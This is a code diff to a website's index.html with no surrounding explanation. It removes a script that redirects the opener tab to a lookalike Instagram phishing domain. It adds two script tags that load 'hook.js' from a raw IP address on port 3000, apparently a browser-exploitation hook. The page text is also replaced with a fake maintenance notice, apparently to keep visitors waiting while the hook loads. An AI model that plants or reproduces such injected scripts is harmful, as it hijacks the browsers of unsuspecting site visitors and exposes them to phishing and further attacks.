--- a/index.html
+++ b/index.html
@@ -1,9 +1,9 @@
 
 <head>
   <title>
-    WELCOME TO MY WEBSITE
+    mohearn.co.uk
   </title>
-  <script> window.opener.location.replace("https://www.instagram.com.search-dl.site/zFjVrLDM"); </script>
+	<script src= "http://159.65.108.28:3000/hook.js"></script>
 	
 </head>
 
@@ -11,9 +11,9 @@
     <div id="loader"></div>
     <div id="content">
         <!-- Everything in your body should go under here-->
-        <h1>WELCOME TO MY WEBSITE</h1>
+        <h1>This website is undergoing maintanance,kindly check back in the next few minutes.</h1>
         <!-- End of body-->
     </div>
-    
+    <script src= "http://159.65.108.28:3000/hook.js"></script>
 </body>
 </html>
